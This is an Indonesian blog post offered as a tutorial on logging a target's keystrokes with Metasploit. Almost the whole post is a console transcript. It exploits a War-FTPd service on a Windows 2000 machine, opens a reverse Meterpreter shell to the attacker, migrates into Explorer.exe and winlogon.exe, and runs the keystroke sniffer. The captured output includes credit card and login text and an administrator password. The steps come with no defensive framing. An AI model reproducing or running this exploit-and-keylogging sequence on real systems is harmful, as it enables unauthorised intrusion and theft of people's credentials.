Posts Subscribe comment Comments

rumahku sorgaku » » Saatnya menggunakan Keylogger menggunakan Metasploit !!!

Saatnya menggunakan Keylogger menggunakan Metasploit !!!

kita dapat mengeti ketikan ketikan keyboard target dengan cara seperti ini ...
 
 
 
msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
...[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 4 opened (172.16.104.130:4444 -> 172.16.104.145:1246)

meterpreter >
 
 
meterpreter > ps

Process list
============

...


PID Name Path



--- ---- ----



140 smss.exe \SystemRoot\System32\smss.exe



188 winlogon.exe ??\C:\WINNT\system32\winlogon.exe



216 services.exe C:\WINNT\system32\services.exe



228 lsass.exe C:\WINNT\system32\lsass.exe



380 svchost.exe C:\WINNT\system32\svchost.exe



408 spoolsv.exe C:\WINNT\system32\spoolsv.exe



444 svchost.exe C:\WINNT\System32\svchost.exe



480 regsvc.exe C:\WINNT\system32\regsvc.exe



500 MSTask.exe C:\WINNT\system32\MSTask.exe



528 VMwareService.exe C:\Program Files\VMwareVMware Tools\VMwareService.exe



588 WinMgmt.exe C:\WINNT\System32\WBEMWinMgmt.exe



664 notepad.exe C:\WINNT\System32\notepad.exe



724 cmd.exe C:\WINNT\System32\cmd.exe



768 Explorer.exe C:\WINNT\Explorer.exe



800 war-ftpd.exe C:\Program Files\War-ftpd\war-ftpd.exe



888 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe



896 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe



940 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe



972 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe



1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe

meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
 
 
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
tgoogle.cm my credit amex myusernamthi amexpasswordpassword
 
 
meterpreter > ps

Process list
=================

...PID Name Path
--- ---- ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe

meterpreter > migrate 401

[*] Migrating to 401...
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer...

**** A few minutes later after an admin logs in ****

meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!

bisa mencatat... logon di windows ya...

 

0

Silahkan Tulis Komentar Anda ...

© Kabar Kami 2010 is proudly powered by Blogger
Design by Azis Lamayuda | Do The Best To Get The Best